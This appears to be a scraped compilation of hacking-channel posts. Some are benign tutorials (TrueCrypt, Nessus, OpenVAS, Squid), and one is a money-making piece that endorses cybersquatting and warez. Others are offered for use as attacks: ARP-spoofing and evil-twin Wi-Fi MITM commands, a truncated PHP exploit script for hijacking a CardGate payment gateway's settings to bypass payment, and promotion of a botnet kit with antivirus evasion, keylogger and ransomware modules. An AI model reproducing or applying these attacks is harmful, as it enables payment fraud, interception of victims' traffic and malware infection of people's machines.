▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Directory Encryption-kali linux :

A directory encryption tool TrueCrypt is provided in Kali.
> This tool is an open source green encryption volume encryption software, which does not need to generate any files to create a virtual disk on the hard disk.
pinterest.com/UnderCodeOfficial

> Users can access by the drive letter, so the files on the virtual disk are automatically encrypted, and they need to be decrypted with a password.
> TrueCrypt provides a variety of encryption algorithms, including AES, Serpent, Twofish, AES-Twofish, and AES-Twofish-Serpent. This section will introduce the use of TrueCrypt tools.


🦑 Create encrypted directory
Use TrueCrypt tool to encrypt the directory. The specific operation steps are shown below.

1) Start TrueCrypt tool. Execute the following command in the terminal:

> root@kali:~# truecrypt

> After executing the above command, the interface shown
2) Click the Create Volume button on this interface, and the interface shown

3) In this interface, choose to create a volume container. Here, select the default Create an encrypted file container option and click the Next button

4) Specifying a new TrueCrypt volume

> Specify a name and location for the new volume on this interface. The volume name created here is CryptVolume, and it is stored in the / root directory. Then click the "Save" button

5) Volume Location

> In this interface, you can see the name and location of the volume created earlier. Then click the Next button

6) Encryption Options

Select the encryption algorithm in this interface, here select the default encryption algorithm AES, and then click Next button

7) Volume Size

> Specify the volume size as 10GB on this interface, and then click the Next button

8) Volume Password

> Enter a volume password on this interface, and then click the Next button

9) Warning message

> The interface prompts that the password set is too short, and the recommended size is 20 characters. If you confirm that you want to use the password, click the "Yes" button, and the interface shown

10) Format Options

Select the file system type on this interface. The default is FAT. The tool also supports Linux Ext2, Linux EXt3, and Linux Ext4 file types. Select Linux Ext4 here and click the Next button.

11) Cross-Platform Support

<> This interface selects a platform for mounting the volume.
> mount the volume only on Linux. Click the Next button to display the interface

12) Volume Format

Now you want to format the volume created earlier. At this time, click the Format button

13) Format process

The interface displays the formatted progress, speed, and time. After the process is finished a prompt message appear

14) TrueCrypt volume created successfully

it means that the TrueCrypt volume was created successfully. At this point, click the "OK" button

15) Volume Created

At this point, the TrueCrypt volume is created. If you want to create another TrueCrypt volume, click the Next button. Otherwise click the Exit button. After clicking the Exit button, you will return to the interface

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is Vulnerability Scanning ?
t.me/UndercOdeTesting

1) A vulnerability scanner is a program that automatically finds and discovers security vulnerabilities in computers, information systems, networks, and applications.

2) It detects the target system through the network, generates data to the target system, and matches the feedback data with its own vulnerability signature database, and then lists the security vulnerabilities existing on the target system. Vulnerability scanning is an indispensable method to ensure system and network security.

3) In the face of Internet intrusion, if users can find security vulnerabilities through network scanning as early as possible according to the specific application environment, and take appropriate measures to repair them in a timely manner. It can effectively prevent the occurrence of intrusion events.

4) Since the work is relatively boring, we can implement it with some convenient tools, such as Nessus and OpenVAS.
Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Install and configure Nessus :

> In order to locate vulnerabilities on the target system, Nessus relies on the format of feeds to implement vulnerability checks. Nessus official website provides two versions: Home Edition and Professional Edition.

1) Home Edition: Home Edition is for non-commercial or personal use.

> The home version is more suitable for personal use and can be used in non-professional environments.

2) Professional: Professional is for commercial use. It includes support or additional features such as wireless concurrent connections.

> This section uses the home version of Nessus to introduce its installation.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Download the Nessus software package. Nessus's official download address is http://www.tenable.com/products/nessus/select-your-operating-system .

2) Enter the address in the browser, and the interface will shown

3) Nessus download interface

> Under Download Nessus on the left side of the interface, click Linux and choose to download the Nessus-5.2.6- debian6_i386.deb package

4) Receiving a license

> Click the Agree button on this interface and the download will start. Then save the downloaded package to the location you want to save.

> After downloading the Nessus software package, you can now install the tool. The execution command is as follows:

> root@kali:~# dpkg -i Nessus-5.2.6-debian6_i386.deb
Selecting previously unselected package nessus.

5) All plugins loaded

- You can start nessusd by typing /etc/init.d/nessusd start
- Then go to https://kali:8834/ to configure your scanner

> If you see a similar output message above, the Nessus software package is successfully installed. Nessus will be installed by default in the / opt / nessus directory.

6) Start Nessus. The execution command is as follows:
root@kali:~# /etc/init.d/nessusd start

$Starting Nessus

7) Plug-in program

private: Only you can use this policy to scan.

shared: Other users can also use this policy to scan.

8) This interface displays all plug-in programs, and all are started by default. In this interface,

> you can click the Disable All button to disable all launched plug-in programs. Then specify the plug-in programs that need to be started, such as the Debian Local Security Checks and Default Unix Accounts plug-in programs

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Keep tunned Next For Termux, and some Cve 2020 😁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Learn Using OpenVAS

> OpenVAS (Open Vulnerability Assessment System) is a client / server architecture that is commonly used to assess vulnerabilities on target hosts. OpenVAS is a branch of the Nessus project, and the products it provides are completely free. OpenVAS is installed by default on standard Kali Linux. This section describes how to configure and start OpenVAS.

🦑 Configure OpenVAS
OpenVAS is installed by default in Kali Linux. If you want to use the tool, you need to do some configuration. The specific steps for configuring OpenVAS are shown below.

1) Switch to the OpenVAS directory in the terminal window and create an SSL certificate for the OpenVAS program. The execution command is as follows:

root@kali:~# cd /usr/share/openvas/

root@kali:/usr/share/openvas# openvas-mkcert

2) After executing the above command, the following information will be output:
143-01

The above information can be configured or not configured. If you don't want to configure it, just press Enter to accept the default value. After the above information is set, the following information will be displayed:
-----------------------------------------------
Creation of the OpenVAS SSL Certificate
-----------------------------------------------
Congratulations. Your server certificate was properly created.
The following files were created:
. Certification authority:
Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem
. OpenVAS Server :
Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem
Press [ENTER] to exit
The output shows the OpenVAS certificate created and its location. Press Enter at this time to exit the program.


3) Use the OpenVAS NVT Feed to synchronize the OpenVAS NVT database and update the latest vulnerability check. The execution command is as follows:

root@kali:/usr/share/openvas# openvas-nvt-sync

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.

[i] The 'OpenVAS NVT Feed' is provided by 'The OpenVAS Project'.

[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed.html'.

[i] NVT dir: /var/lib/openvas/plugins

[i] rsync is not recommended for the initial sync. Falling back on http.

[i] Will use wget

[i] Using GNU wget: /usr/bin/wget

[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt-feed-current.tar.bz2

🦑The output above shows the detailed process of generating the client certificate, and added the om user.

> Rebuild the database. The execution command is as follows:

root@kali:/usr/share/openvas# openvasmd –rebuild

After executing the above command, there is no output information.

4) Start OpenVAS scan and load all plugins. The execution command is as follows:
root@kali:/usr/share/openvas# openvassd
Loading the OpenVAS plugins…base gpgme-Message: Setting GnuPG homedir to '/etc/openvas/ gnupg'
base gpgme-Message: Using OpenPGP engine version '1.4.12'
All plugins loaded

5) From the output, you can see that all plugins have been loaded. Since there are many plugins loaded, it takes longer to execute this command.

6) Rebuild and create a backup of the database. The execution command is as follows:

root@kali:/usr/share/openvas# openvasmd --rebuild

root@kali:/usr/share/openvas# openvasmd –backup

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How make money from internet NEW Methodes ?
instagram.com/UndercOdeTestingCompany


1) Creating sites to order or any other type of freelance (remote work) on the Internet is rather poorly suited for novice users, because it requires certain knowledge in the field of webmastering, programming, or any other chosen area of ​​application of effort. But it does not require investments, and if you, say, got acquainted with how to create a blog or create a website yourself , you can already offer your services on freelancers ’exchanges, thematic forums, or on your own resource.

Prominent representatives of freelance exchanges are Work-zilla , Weblancer , Quark and Freelancer.com . Over time, you will have both experience and professional skills that will help you do your job faster and earn more on it. I rarely use freelance (unless as a moneymaker), because again I do not want to work for my uncle. Nature is so freedom-loving.

But many due to this, we can say, live and are quite happy with their income level and position. Freelance includes not only webmastering, but also earnings from promoting other people's projects, writing various scripts and texts to order, work in the field of design, advertising services, distance learning, etc. (see the details in a separate article on freelance, the link to which is given a little higher).

2) Reselling domains ( cybersquatting ) - you can try to check domain names that have not been registered by anyone, but potentially have great prospects. For example, consonant with the activities of a commercial company, as well as promising for promotion on certain search queries or for the creation of certain Internet services, portals, etc.

Such domain names are registered for the purpose of their further resale to those who are ready to pay the required amount for them. A domain may well be bought at cost (even if, for example, six hundred rubles), and sold already for thousands or even millions of rubles (fantastic, however). I myself have never been involved in cybersquatting, but nevertheless many webmasters are not averse to trying to earn millions on this (for example, the same Maul).

When I selected a domain name for my future Internet project (which is now called KtoNaNovenkogo.ru), I tried so many different combinations, but almost everything was taken. Moreover, there were no websites as such on these domains. Those. cybersquatters have already taken almost everything, which then is likely to earn.

3) File hosting - you upload something there and for each download of these files you get some money. Probably, it was possible to earn more or less decently on this earlier, but only having your own, well-developed Internet project, for example, a warez, where you will upload counterfeit software or video. True, search engines now strongly dislike such sites, so ...

4) You can also earn money on YouTube - just create your own channel , add your author’s videos to it periodically, enter into a partnership agreement with YouTube, and then just get a percentage of the ad in your videos from Google. But this is far from all, and not even a large part. Read about other ways to earn money on YouTube .


5) The specialty of the administrator of groups (publics, business pages) on Facebook, Contact, Instagram or another social network is now becoming more and more popular. The beauty of this work is that you will not need special knowledge and mental efforts, but you will still have to pass a preliminary training course. On this blog, I began to describe some of the moments of this online business under the rubrics of Facebook , YouTube , Vkontakte and Instagram > @UndercOdeTesting. There are so far only a few articles, but in the future I will try to develop this topic in more detail.

> How Make Money from Internet >

6) Paid consultations are a fairly common option of part-time work on the network among advanced webmasters (for example, auditing a site to solve problems with its promotion in search engines), and indeed among specialists in any field. Sometimes letters also come to me with a request to provide a paid consultation either on promotion or on creating an Internet resource.

7) If you are considered a specialist in any field (well, or at least you yourself consider such a specialist), then you can very well create your own information business and start making money on its sales (several thousand rubles per copy). If you decide to do this, I advise you to pay attention to the JustClick system , which includes a full set of tools (affiliate program, store, email service, etc.).

Having screwed JustClick, you can significantly increase the number of sales (however, you have to give a third of the earnings to partners, but you should not be greedy here). I advise you to familiarize yourself with the interview I took from one of the most successful (and, importantly, honest) information businessmen in the field of webmastering by the name and surname of Evgeny Popov and the list of video lessons that he offers.

8) In principle, it is possible to receive income without investments not only online . For example, in an article about how to make money you will find a description of both online and offline options for generating income, which I do not touch in this publication.

9) Forex and other exchange speculation on the network (for example, mutual funds) are also presented as one of the main methods of extracting voiced coins from the Internet. Perhaps this is so, but it necessarily requires investment

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Websploit is a high level MITM framework for any wifi network 2020 updated,
twitter.com/UndercOdeTC

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/websploit/websploit.git

2) cd websploit

3) python setup.py install

4) Execute via command line :

$ websploit

Select module :

5) wsf > use arp_spoof
with options command you can see options of current module:

6) wsf > arp_spoof > options
Change options with set command:

7) wsf > arp_spoof > set target 192.168.1.24
Finally run module via execute command:

8) wsf > arp_spoof > execute

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate wifi attack 2020 :
WireSpy allows attackers to set up quick honeypots to carry out MITMAs. Monitoring and logging functionality is implemented in order to keep records of the victims' traffic/activities. Other tools can be used together with Wirespy to conduct more advanced attacks.
pinterest.com/UnderCodeOfficial

🦑 Two type of attacks are supported at the moment:

> Evil twin: Force victims to auto-connect to the honeypot by spoofing a "trusted" hotspot (clone an existing access point and de-authenticate its users to force them to transparently connect to the spoofed honeypot).

> Honeypot: Set up a simple rogue hotspot and wait for clients to connect.

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/aress31/wirespy

2)cd wirespy

3) chmod +x wirespy.sh

Run the script with root privileges:
$ sudo ./wirespy.sh

4) Type help to display the list of available commands.
Available commands
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack

Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Proxy Service-Access Control by URL in Squid :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


> The method of access control in Squid through the URL of the visited site:

> In Squid, It is convenient to perform access control through the URL of the visited site. An example is as follows:
Suppose you want to prevent users from accessing all sites with sex in the URL. You can do this:

1) Define a new acl via dstdom_regex. In this example we assume that this new acl is called badrul:
acl badurl dstdom_regex sex

2) Add the corresponding access control items. It should be noted that because Squid checks the legality of access one by one, you must add
http_access deny items (that is, prohibited items) before http_acces allow

3) to ensure that Squid can Check the project. For example:

http_access deny badurl

http_access allow all

http_access deny ...

and so on.

4) In this way, when the URL of the user accessing the site contains the word sex, Squid will prohibit their access and give an error message of forbidden access.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Proxy service-squid user authentication settings
instagram.com/UmdercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

By default, Squid does not have any authentication procedures, but user authentication can be achieved through external authentication procedures .

Generally there are the following authentication procedures: LDAP authentication, SMB authentication, mysql-based authentication, sock5-based password authentication,
and Radius-based authentication. The following describes the commonly used ncsa authentication. Ncsa is
one of the authentication programs that comes with the Squid source code package . The implementation steps are as follows:

1) Enter the / usr / local / squid / auth_modules / NCSA directory and execute:
make
make install

2) After the compilation is successful, the ncsa_auth executable file is generated, and the generated executable file is copied to the / usr / bin directory.

3) Modify the options in the squid.conf file.
acl auth_user proxy_auth REQUIRED
http_access allow auth_user
authenticate_program / usr / local / squid / bin / ncsa_auth
/ usr / local / squid / etc / passwd

4) Use the tool htpasswd carried by Apache to generate a password file under / usr / locad / squid / etc. And add phase
Corresponding user information. Each line of the password file contains information about one user, namely the username and password. For example, use
htpasswd to generate a password file passwd and add the user me:
htpasswd -c / usr / local / squid / etc / passwd me

5) Restart Squid and the password authentication will take effect.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 CVE Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass ☠️
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).

[code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
*/

/*
Usage:

1) Change values of the constants (see below for TARGET & ORDER*)

2) Host this script somewhere (must be public accessible)

3) Register a merchant at https://cardgate.com

4) Sign into "My CardGate" dashboard

5) Add fake site or choose existing one

6) Click "Setup your Webshop" button in site preferences

7) Paste the URL of this script into the pop-up window and click "Save"

8) The target store now uses the settings of your site, enjoy :]


P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sToken_
* @param bool $bTestmode_
* @return string
*/
function pullConfig($sToken_, $bTestmode_ = FALSE) {
if (!is_string($sToken_)) {
throw new Exception('invalid token for settings pull: ' . $sToken_);
}

$sResource = "pullconfig/{$sToken_}/";
$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

$rCh = curl_init();
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'Accept: application/json'
]);
if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
} else {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
}

if (FALSE == ($sResults = curl_exec($rCh))) {
$sError = curl_error($rCh);
curl_close($rCh);

🦑See full code on same git link
> tested by Underc0de

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How To Build Your Own Botnet 2020 Updated
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules
t.me/UndercOdeTesting

🦑 FEATURES :

1) Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules

2) Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
Nothing Written To The Disk: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process

3) Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host

4) Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running

5) Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process

6) Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size

7) Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed

8) Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)

9) Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning

10) Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it

11) Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected☠️

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) Clone On You Windows Or Linux
> https://github.com/malwaredllc/byob

2) GO to byob Folder

3) Check Those Lib each lib is specify to build Example :

> Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered

> Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop

> Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam

> Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment

> Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client

> Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file

> Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods

> Phone (byob.modules.phone): read/search/upload text messages from the client smartphone

> Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges

> Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports

> Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host